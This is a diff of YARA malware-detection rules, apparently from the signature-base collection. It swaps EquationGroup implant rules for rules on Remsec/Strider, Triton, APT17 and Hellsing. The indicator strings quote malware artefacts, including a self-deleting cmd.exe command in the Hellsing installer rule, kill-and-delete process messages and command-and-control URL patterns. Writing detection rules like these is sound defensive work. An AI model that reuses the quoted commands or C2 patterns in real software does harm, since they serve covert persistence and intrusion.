+		logic_hash = "4f10c24a8480c17c2939fe3fecba2820b22f8a47bc2b2e73ac1080a355025d7c"
+		score = 80
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "137749c0fbb8c12d1a650f0bfc73be2739ff084165d02e4cb68c6496d828bf1d"
+		tags = ""
 
 	strings:
-		$x1 = "Error: Attempt to hide all TCP connections (any:any)." fullword wide
-		$x2 = "privilegeRunInKernelMode failed" fullword wide
-		$x3 = "Failed to unhide requested connection" fullword wide
-		$x4 = "Nethide running in USER_MODE" fullword wide
-		$x5 = "Not enough slots for all of the list.  Some entries may have not been hidden." fullword wide
+		$open_process = { 91 9A 8F B0 9C 90 8D AF 8C 8C 9A FF }
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 300KB and 1 of them ) or ( all of them )
+		all of them
 }
-rule SIGNATURE_BASE_Equationgroup_PC_Level4_Flav_Dll_X64 : FILE
+rule SIGNATURE_BASE_Remsec_Packer_A
 {
 	meta:
-		description = "EquationGroup Malware - file PC_Level4_flav_dll_x64"
-		author = "Florian Roth (Nextron Systems)"
-		id = "f05dd0b6-106c-5d1d-ba09-4ac3035e7030"
-		date = "2017-01-13"
+		description = "Detects malware from Symantec's Strider APT report"
+		author = "Symantec"
+		id = "d75198ab-b1ea-572a-a674-9a38c3e2958b"
+		date = "2016-08-08"
 		modified = "2023-12-05"
-		reference = "https://goo.gl/tcSoiJ"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp.yar#L1506-L1521"
+		reference = "http://www.symantec.com/connect/blogs/strider-cyberespionage-group-turns-eye-sauron-targets"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_strider.yara#L64-L76"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "9c874581567909055deeae4f992bd99c1e08d5f62655d1cc9a7316beb8513d8f"
-		score = 75
+		logic_hash = "b46a41686fbf1c63e8a8b583859f23bf789bc9f11ee6b1fb01bb08e602772e76"
+		score = 80
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "25a2549031cb97b8a3b569b1263c903c6c0247f7fff866e7ec63f0add1b4921c"
+		tags = ""
 
 	strings:
-		$s1 = "wship.dll" fullword wide
-		$s2 = "   IP:      " fullword ascii
-		$s3 = "\\\\.\\%hs" fullword ascii
+		$code = { 69 ( C? | D? | E? | F? ) AB 00 00 00 ( 81 | 41 81 ) C? CD 2B 00 00 ( F7 | 41 F7 ) E? ( C1 | 41 C1 ) E? 0D ( 69 | 45 69 ) ( C? | D? | E? | F? ) 85 CF 00 00 ( 29 | 41 29 | 44 29 | 45 29 | 2B | 41 2B | 44 2B | 45 2B ) }
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 200KB and all of them )
+		all of them
 }
-rule SIGNATURE_BASE_Equationgroup_PC_Level4_Flav_Exe : FILE
+rule SIGNATURE_BASE_Remsec_Packer_B
 {
 	meta:
-		description = "EquationGroup Malware - file PC_Level4_flav_exe"
-		author = "Florian Roth (Nextron Systems)"
-		id = "eb93a798-4e7e-52dc-a39b-bfb63a58d250"
-		date = "2017-01-13"
+		description = "Detects malware from Symantec's Strider APT report"
+		author = "Symantec"
+		id = "18e7f84e-27f2-532d-9ead-0db6e9e6c0b2"
+		date = "2016-08-08"
 		modified = "2023-12-05"
-		reference = "https://goo.gl/tcSoiJ"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp.yar#L1523-L1541"
+		reference = "http://www.symantec.com/connect/blogs/strider-cyberespionage-group-turns-eye-sauron-targets"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_strider.yara#L78-L90"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "975d327d5922e4b179a677501c2613186ea85299958a996dcdeb503b02495ff7"
-		score = 75
+		logic_hash = "9c63b5934d60b59a33364ef56c913220e59b9798a682a7f97e6755270adf4e4b"
+		score = 80
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "33ba9f103186b6e52d8d69499512e7fbac9096e7c5278838127488acc3b669a9"
+		tags = ""
 
 	strings:
-		$s1 = "Extended Memory Runtime Process" fullword wide
-		$s2 = "memess.exe" fullword wide
-		$s3 = "\\\\.\\%hs" fullword ascii
-		$s4 = ".?AVOpenSocket@@" fullword ascii
-		$s5 = "Corporation. All rights reserved." fullword wide
-		$s6 = "itanium" fullword wide
+		$code = { 48 8B 05 ?? ?? ?? ?? 48 89 44 24 ?? 48 8B 05 ?? ?? ?? ?? 48 8D 4C 24 ?? 48 89 44 24 ?? 48 8D ( 45 ?? | 84 24 ?? ?? 00 00 ) ( 44 88 6? 24 ?? | C6 44 24 ?? 00 ) 48 89 44 24 ?? 48 8D ( 45 ?? | 84 24 ?? ?? 00 00 ) C7 44 24 ?? 0? 00 00 00 2B ?8 48 89 ?C 24 ?? 44 89 6? 24 ?? 83 C? 08 89 ?C 24 ?? ( FF | 41 FF ) D? ( 05 | 8D 88 ) 00 00 00 3A }
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 200KB and all of them )
+		all of them
 }
-rule SIGNATURE_BASE_Equationgroup_Processinfo_Implant : FILE
+rule SIGNATURE_BASE_Triton_Trilog : FILE
 {
 	meta:
-		description = "EquationGroup Malware - file processinfo_Implant.dll"
+		description = "Detects Triton APT malware - file trilog.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "b110d819-2298-507b-91bb-2787bb11322e"
-		date = "2017-01-13"
+		id = "ae2c9b47-2a67-50c6-9d2a-dc47b4fa69ef"
+		date = "2017-12-14"
 		modified = "2023-12-05"
-		reference = "https://goo.gl/tcSoiJ"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp.yar#L1543-L1558"
+		reference = "https://goo.gl/vtQoCQ"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_triton.yar#L70-L85"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "b0aace3c6fa20c5bb238264b2aa484d548945a4c2ccb65482cce71427f061604"
+		logic_hash = "6406e9e7651978a6817079945dc801afdb6c16dd107527cbfd9a946eca27a51a"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "aadfa0b1aec4456b10e4fb82f5cfa918dbf4e87d19a02bcc576ac499dda0fb68"
+		hash1 = "e8542c07b2af63ee7e72ce5d97d91036c5da56e2b091aa2afe737b224305d230"
 
 	strings:
-		$s1 = "hZwOpenProcessToken" fullword ascii
-		$s2 = "hNtQueryInformationProcess" fullword ascii
-		$s3 = "No mapping" fullword wide
+		$s1 = "inject.bin" ascii
+		$s2 = "PYTHON27.DLL" fullword ascii
+		$s3 = "payload" ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 80KB and all of them )
+		uint16( 0 ) == 0x5a4d and filesize < 60KB and all of them
 }
-rule SIGNATURE_BASE_Equationgroup_Equationdrug_Gen_2 : FILE
+rule SIGNATURE_BASE_APT17_Malware_Oct17_1 : FILE
 {
 	meta:
-		description = "EquationGroup Malware - file PortMap_Implant.dll"
-		author = "Auto Generated"
-		id = "662ee1cf-b837-5362-84a8-1af7335d5e1b"
-		date = "2017-01-13"
+		description = "Detects APT17 malware"
+		author = "Florian Roth (Nextron Systems)"
+		id = "457312d8-5bfe-5282-9ace-2f169278569c"
+		date = "2017-10-03"
 		modified = "2023-12-05"
-		reference = "https://goo.gl/tcSoiJ"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp.yar#L1560-L1574"
+		reference = "https://goo.gl/puVc9q"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_apt17_mal_sep17.yar#L13-L29"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "fcbc518d23dc21d482abcac29505c5404fc9e309554ca7dc9f1014adbff83e1a"
+		logic_hash = "0c4391b47df0c40dbd605515992e5eaa758d0e509e9ad24b517d104b8e7d504c"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		hash1 = "964762416840738b1235ed4ae479a4b117b8cdcc762a6737e83bc2062c0cf236"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "dc9b5e8aa6ec86db8af0a7aa897ca61db3e5f3d2e0942e319074db1aaccfdc83"
 
 	strings:
-		$op1 = { 0c 2b ca 8a 04 11 3a 02 75 01 47 42 4e 75 f4 8b }
-		$op2 = { 14 83 c1 05 80 39 85 75 0c 80 79 01 c0 75 06 80 }
-		$op3 = { eb 3d 83 c0 06 33 f6 80 38 ff 75 2c 80 78 01 15 }
+		$s1 = "\\spool\\prtprocs\\w32x86\\localspl.dll" ascii
+		$s2 = "\\spool\\prtprocs\\x64\\localspl.dll" ascii
+		$s3 = "\\msvcrt.dll" ascii
+		$s4 = "\\TSMSISrv.dll" ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 250KB and all of them )
+		( uint16( 0 ) == 0x5a4d and filesize < 500KB and all of them )
 }
-rule SIGNATURE_BASE_Equationgroup_Equationdrug_Ntevt : FILE
+
+rule SIGNATURE_BASE_APT17_Malware_Oct17_2 : FILE
 {
 	meta:
-		description = "EquationGroup Malware - file ntevt.sys"
+		description = "Detects APT17 malware"
 		author = "Florian Roth (Nextron Systems)"
-		id = "36d23adb-dafe-5e99-8976-b146ceca2f9b"
-		date = "2017-01-13"
+		id = "9f21514a-168b-5158-8322-60fa8499b11a"
+		date = "2017-10-03"
 		modified = "2023-12-05"
-		reference = "https://goo.gl/tcSoiJ"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp.yar#L1577-L1591"
+		reference = "https://goo.gl/puVc9q"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_apt17_mal_sep17.yar#L31-L59"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "c5259c89dfedc34ca032775bda4ead04985da6b3d042b8a6635f5f848570d8c6"
+		logic_hash = "378a21edeaf36267986bd5158fe736b0970b0b9f0ad824f09dc6434a9ba1d7e2"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "45e5e1ea3456d7852f5c610c7f4447776b9f15b56df7e3a53d57996123e0cebf"
+		hash1 = "20cd49fd0f244944a8f5ba1d7656af3026e67d170133c1b3546c8b2de38d4f27"
 
 	strings:
-		$s1 = "ntevt.sys" fullword ascii
-		$s2 = "c:\\ntevt.pdb" fullword ascii
+		$x1 = "Cookie: __xsptplus=%s" fullword ascii
+		$x2 = "http://services.fiveemotions.co.jp" fullword ascii
+		$x3 = "http://%s/ja-JP/2015/%d/%d/%d%d%d%d%d%d%d%d.gif" fullword ascii
+		$s1 = "FoxHTTPClient_EXE_x86.exe" fullword ascii
+		$s2 = "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.3072" ascii
+		$s3 = "hWritePipe2 Error:%d" fullword ascii
+		$s4 = "Not Support This Function!" fullword ascii
+		$s5 = "Global\\PnP_No_Management" fullword ascii
+		$s6 = "Content-Type: image/x-png" fullword ascii
+		$s7 = "Accept-Language: ja-JP" fullword ascii
+		$s8 = "IISCMD Error:%d" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 500KB and all of them )
+		uint16( 0 ) == 0x5a4d and filesize < 100KB and ( pe.exports ( "_foo@0" ) or 1 of ( $x* ) or 6 of them )
 }
-rule SIGNATURE_BASE_Equationgroup_Nethide_Implant : FILE
+
+rule SIGNATURE_BASE_APT17_Unsigned_Symantec_Binary_EFA : FILE
 {
 	meta:
-		description = "EquationGroup Malware - file nethide_Implant.dll"
+		description = "Detects APT17 malware"
 		author = "Florian Roth (Nextron Systems)"
-		id = "36559b69-1718-5d9b-8d6f-3db4becba0c4"
-		date = "2017-01-13"
-		modified = "2023-01-27"
-		reference = "https://goo.gl/tcSoiJ"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp.yar#L1593-L1608"
+		id = "56eec517-8b00-5cb5-9806-249e50f53b99"
+		date = "2017-10-03"
+		modified = "2023-12-05"
+		reference = "https://goo.gl/puVc9q"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_apt17_mal_sep17.yar#L61-L75"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "bd25d05b001ac7d41e60270b62aeecd520a570e76557c68d78d9680c7beb90ab"
+		logic_hash = "7306c8ae2be4dbf56957e11d78ba85bcfa1c8570ba41f749ea5b0e2a05e9df7b"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "b2daf9058fdc5e2affd5a409aebb90343ddde4239331d3de8edabeafdb3a48fa"
+		hash1 = "128aca58be325174f0220bd7ca6030e4e206b4378796e82da460055733bb6f4f"
 
 	strings:
-		$s1 = "\\\\.\\dlcndi" fullword ascii
-		$s2 = "s\\drivers\\" wide
+		$s1 = "Copyright (c) 2007 - 2011 Symantec Corporation" fullword wide
+		$s2 = "\\\\.\\SYMEFA" fullword wide
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 90KB and all of them )
+		( uint16( 0 ) == 0x5a4d and filesize < 200KB and all of them and pe.number_of_signatures == 0 )
 }
-rule SIGNATURE_BASE_Equationgroup_Equationdrug_Gen_4 : FILE
+
+rule SIGNATURE_BASE_APT17_Malware_Oct17_Gen : FILE
 {
 	meta:
-		description = "EquationGroup Malware - file PC_Level4_flav_dll"
-		author = "Auto Generated"
-		id = "e3fc376b-f7cc-5dfa-bcf4-4991962a4cf9"
-		date = "2017-01-13"
+		description = "Detects APT17 malware"
+		author = "Florian Roth (Nextron Systems)"
+		id = "c2156e68-d5b5-5bd7-858c-2d5e90199287"
+		date = "2017-10-03"
 		modified = "2023-12-05"
-		reference = "https://goo.gl/tcSoiJ"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp.yar#L1610-L1624"
+		reference = "https://goo.gl/puVc9q"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_apt17_mal_sep17.yar#L77-L107"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "3046cbfa4b4f5eb5d0efc1b2b658567391b0c219650437088a0d6c179e9235fb"
+		logic_hash = "3e0e4a989a907f5f1aaac4ba43611dd0d2e4b4fd340234f04b3fce25843f9dc6"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		hash1 = "227faeb770ba538fb85692b3dfcd00f76a0a5205d1594bd0969a1e535ee90ee1"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "0375b4216334c85a4b29441a3d37e61d7797c2e1cb94b14cf6292449fb25c7b2"
+		hash2 = "07f93e49c7015b68e2542fc591ad2b4a1bc01349f79d48db67c53938ad4b525d"
+		hash3 = "ee362a8161bd442073775363bf5fa1305abac2ce39b903d63df0d7121ba60550"
 
 	strings:
-		$op1 = { 11 8b da 23 df 8d 1c 9e c1 fb 02 33 da 23 df 33 }
-		$op2 = { c3 0c 57 8b 3b eb 27 8b f7 83 7e 08 00 8b 3f 74 }
-		$op3 = { 00 0f b7 5e 14 8d 5c 33 18 8b c3 2b 45 08 50 ff }
+		$x1 = "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NETCLR 2.0.50727)" fullword ascii
+		$x2 = "http://%s/imgres?q=A380&hl=en-US&sa=X&biw=1440&bih=809&tbm=isus&tbnid=aLW4-J8Q1lmYBM" ascii
+		$s1 = "hWritePipe2 Error:%d" fullword ascii
+		$s2 = "Not Support This Function!" fullword ascii
+		$s3 = "Cookie: SESSIONID=%s" fullword ascii
+		$s4 = "http://0.0.0.0/1" fullword ascii
+		$s5 = "Content-Type: image/x-png" fullword ascii
+		$s6 = "Accept-Language: en-US" fullword ascii
+		$s7 = "IISCMD Error:%d" fullword ascii
+		$s8 = "[IISEND=0x%08X][Recv:] 0x%08X %s" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 300KB and all of them )
+		( uint16( 0 ) == 0x5a4d and filesize < 200KB and ( pe.imphash ( ) == "414bbd566b700ea021cfae3ad8f4d9b9" or 1 of ( $x* ) or 6 of them ) )
 }
-rule SIGNATURE_BASE_Equationgroup_Equationdrug_Tdi6 : FILE
+rule SIGNATURE_BASE_Apt_Hellsing_Implantstrings : FILE
 {
 	meta:
-		description = "EquationGroup Malware - file tdi6.sys"
-		author = "Florian Roth (Nextron Systems)"
-		id = "c6dbc28a-ec52-5256-afff-ab15ed1b90a6"
-		date = "2017-01-13"
+		description = "detection for Hellsing implants"
+		author = "Kaspersky Lab"
+		id = "00aa5885-ae79-5d68-8587-13d3e8965630"
+		date = "2015-04-07"
 		modified = "2023-12-05"
-		reference = "https://goo.gl/tcSoiJ"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp.yar#L1626-L1642"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_hellsing_kaspersky.yar#L2-L29"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "ba7e14a3bf158795ecee498976847fbbcc80635799be4574f05aa80d1a85a4ef"
+		logic_hash = "d62dc766a40d1dc7044cc5c9f07a78d36e231b771fafb52442b26514f4c603db"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "12c082f74c0916a0e926488642236de3a12072a18d29c97bead15bb301f4b3f8"
+		version = "1.0"
+		filetype = "PE"
 
 	strings:
-		$s1 = "tdi6.sys" fullword wide
-		$s3 = "TDI IPv6 Wrapper" fullword wide
-		$s5 = "Corporation. All rights reserved." fullword wide
-		$s6 = "FailAction" fullword wide
+		$a1 = "the file uploaded failed !"
+		$a2 = "ping 127.0.0.1"
+		$b1 = "the file downloaded failed !"
+		$b2 = "common.asp"
+		$c = "xweber_server.exe"
+		$d = "action="
+		$debugpath1 = "d:\\Hellsing\\release\\msger\\" nocase
+		$debugpath2 = "d:\\hellsing\\sys\\xrat\\" nocase
+		$debugpath3 = "D:\\Hellsing\\release\\exe\\" nocase
+		$debugpath4 = "d:\\hellsing\\sys\\xkat\\" nocase
+		$debugpath5 = "e:\\Hellsing\\release\\clare" nocase
+		$debugpath6 = "e:\\Hellsing\\release\\irene\\" nocase
+		$debugpath7 = "d:\\hellsing\\sys\\irene\\" nocase
+		$e = "msger_server.dll"
+		$f = "ServiceMain"
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 100KB and all of them )
+		uint16( 0 ) == 0x5a4d and ( all of ( $a* ) ) or ( all of ( $b* ) ) or ( $c and $d ) or ( any of ( $debugpath* ) ) or ( $e and $f ) and filesize < 500000
 }
-rule SIGNATURE_BASE_Equationgroup_Modifyauthentication_Implant : FILE
+rule SIGNATURE_BASE_Apt_Hellsing_Installer : FILE
 {
 	meta:
-		description = "EquationGroup Malware - file modifyAuthentication_Implant.dll"
-		author = "Florian Roth (Nextron Systems)"
-		id = "990035c5-cd9c-59e0-b244-e2caafd2561f"
-		date = "2017-01-13"
+		description = "detection for Hellsing xweber/msger installers"
+		author = "Kaspersky Lab"
+		id = "0aca838e-813a-59ee-8a04-7d2f4e854075"
+		date = "2015-04-07"
 		modified = "2023-12-05"
-		reference = "https://goo.gl/tcSoiJ"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp.yar#L1644-L1661"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_hellsing_kaspersky.yar#L31-L54"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "8bdc4c9e9a3e327bb55781670d8f373d5a8904ccd47cc4b67673c47a76c54927"
+		logic_hash = "556898e9507835d93e2cf7e21e997b6e64dc154ac675b429f5f8226bf929309c"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "e1dff24af5bfc991dca21b4e3a19ffbc069176d674179eef691afc6b1ac6f805"
+		version = "1.0"
+		filetype = "PE"
 
 	strings:
-		$s1 = "LSASS.EXE" fullword wide
-		$s2 = "hsamsrv.dll" fullword ascii
-		$s3 = "hZwOpenProcess" fullword ascii
-		$s4 = "hOpenProcess" fullword ascii
-		$s5 = ".?AVFeFinallyFailure@@" fullword ascii
+		$cmd = "cmd.exe /c ping 127.0.0.1 -n 5&cmd.exe /c del /a /f \"%s\""
+		$a1 = "xweber_install_uac.exe"
+		$a2 = "system32\\cmd.exe" wide
+		$a4 = "S11SWFOrVwR9UlpWRVZZWAR0U1aoBHFTUl2oU1Y="
+		$a5 = "S11SWFOrVwR9dnFTUgRUVlNHWVdXBFpTVgRdUlpWRVZZWARdUqhZVlpFR1kEUVNSXahTVgRaU1YEUVNSXahTVl1SWwRZValdVFFZUqgQBF1SWlZFVllYBFRTVqg="
+		$a6 = "7dqm2ODf5N/Y2N/m6+br3dnZpunl44g="
+		$a7 = "vd/m7OXd2ai/5u7a59rr7Ki45drcqMPl5t/c5dqIZw=="
+		$a8 = "vd/m7OXd2ai/usPl5qjY2uXp69nZqO7l2qjf5u7a59rr7Kjf5tzr2u7n6euo4+Xm39zl2qju5dqo4+Xm39zl2t/m7ajr19vf2OPr39rj5eaZmqbs5OSINjl2tyI"
+		$a9 = "C:\\Windows\\System32\\sysprep\\sysprep.exe" wide
+		$a10 = "%SystemRoot%\\system32\\cmd.exe" wide
+		$a11 = "msger_install.dll"
+		$a12 = {00 65 78 2E 64 6C 6C 00}
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 200KB and all of them )
+		uint16( 0 ) == 0x5a4d and ( $cmd and ( 2 of ( $a* ) ) ) and filesize < 500000
 }
-rule SIGNATURE_BASE_Equationgroup_Ntfltmgr : FILE
+rule SIGNATURE_BASE_Apt_Hellsing_Proxytool : FILE
 {
 	meta:
-		description = "EquationGroup Malware - file ntfltmgr.sys"
-		author = "Florian Roth (Nextron Systems)"
-		id = "dd7fd371-a097-5df5-9ffd-89babbadee96"
-		date = "2017-01-13"
+		description = "detection for Hellsing proxy testing tool"
+		author = "Kaspersky Lab"
+		id = "54454f07-11a9-5456-b489-9a9610e53123"
+		date = "2015-04-07"
 		modified = "2023-12-05"
-		reference = "https://goo.gl/tcSoiJ"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp.yar#L1663-L1679"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_hellsing_kaspersky.yar#L56-L74"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "3e931088f363c7dfb6057019faf9e5c674c90f6bdae6211dcc871464b410efd3"
-		score = 75
+		logic_hash = "8f2656e7b4e6fb5336fb4e39bcec3e99531db532f757b65e3aa12cd2a4334840"
+		score = 50
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "f7a886ee10ee6f9c6be48c20f370514be62a3fd2da828b0dff44ff3d485ff5c5"
+		version = "1.0"
+		filetype = "PE"
 
 	strings:
-		$s1 = "ntfltmgr.sys" fullword wide
-		$s2 = "ntfltmgr.pdb" fullword ascii
-		$s4 = "Network Filter Manager" fullword wide
-		$s5 = "Corporation. All rights reserved." fullword wide
+		$a1 = "PROXY_INFO: automatic proxy url => %s"
+		$a2 = "PROXY_INFO: connection type => %d"
+		$a3 = "PROXY_INFO: proxy server => %s"
+		$a4 = "PROXY_INFO: bypass list => %s"
+		$a5 = "InternetQueryOption failed with GetLastError() %d"
+		$a6 = "D:\\Hellsing\\release\\exe\\exe\\" nocase
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 100KB and all of them )
+		uint16( 0 ) == 0x5a4d and ( 2 of ( $a* ) ) and filesize < 300000
 }
-rule SIGNATURE_BASE_Equationgroup_DXGHLP16 : FILE
+rule SIGNATURE_BASE_Apt_Hellsing_Xkat : FILE
 {
 	meta:
-		description = "EquationGroup Malware - file DXGHLP16.SYS"
-		author = "Florian Roth (Nextron Systems)"
-		id = "d9e39c22-f606-5d9c-a5e2-e536b8566595"
-		date = "2017-01-13"
-		modified = "2023-01-06"
-		reference = "https://goo.gl/tcSoiJ"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp.yar#L1681-L1702"
+		description = "detection for Hellsing xKat tool"
+		author = "Kaspersky Lab"
+		id = "c831ce04-8fb2-5790-8aaf-c88b370835ac"
+		date = "2015-04-07"
+		modified = "2023-12-05"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_hellsing_kaspersky.yar#L76-L97"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "5244cef876af4c0c02109599e6250254c854ed5c9bd2d0ccc44676dca21a1650"
+		logic_hash = "ba74ca11c96e59a04f1cb57b4866df7a581ad94ca81230f2ca5068c8808297aa"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		hash1 = "fcfb56fa79d2383d34c471ef439314edc2239d632a880aa2de3cea430f6b5665"
+		version = "1.0"
+		filetype = "PE"
 
 	strings:
-		$s1 = "DXGHLP16.SYS" fullword wide
-		$s2 = "P16.SYS" fullword ascii
-		$s3 = "\\Registry\\User\\CurrentUser\\" wide
-		$s4 = "\\DosDevices\\%ws" wide
-		$s5 = "\\Device\\%ws_%ws" wide
-		$s6 = "ct@SYS\\DXGHLP16.dbg" fullword ascii
-		$s7 = "%ws%03d%ws%wZ" fullword wide
-		$s8 = "TCP/IP driver" fullword wide
-		$s9 = "\\Device\\%ws" wide
+		$a1 = "\\Dbgv.sys"
+		$a2 = "XKAT_BIN"
+		$a3 = "release sys file error."
+		$a4 = "driver_load error. "
+		$a5 = "driver_create error."
+		$a6 = "delete file:%s error."
+		$a7 = "delete file:%s ok."
+		$a8 = "kill pid:%d error."
+		$a9 = "kill pid:%d ok."
+		$a10 = "-pid-delete"
+		$a11 = "kill and delete pid:%d error."
+		$a12 = "kill and delete pid:%d ok."
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 200KB and all of them )
+		uint16( 0 ) == 0x5a4d and ( 6 of ( $a* ) ) and filesize < 300000
 }
-rule SIGNATURE_BASE_Equationgroup_Equationdrug_Msgkd : FILE
+rule SIGNATURE_BASE_Apt_Hellsing_Msgertype2 : FILE
 {
 	meta:
-		description = "EquationGroup Malware - file msgkd.ex_"
-		author = "Florian Roth (Nextron Systems)"
-		id = "41019119-9bf4-5a45-b74b-f75ab7738821"
-		date = "2017-01-13"
+		description = "detection for Hellsing msger type 2 implants"
+		author = "Kaspersky Lab"
+		id = "98f151de-c1c2-56c1-8c64-5d1f437e0742"
+		date = "2015-04-07"
 		modified = "2023-12-05"
-		reference = "https://goo.gl/tcSoiJ"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp.yar#L1704-L1718"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_hellsing_kaspersky.yar#L99-L117"
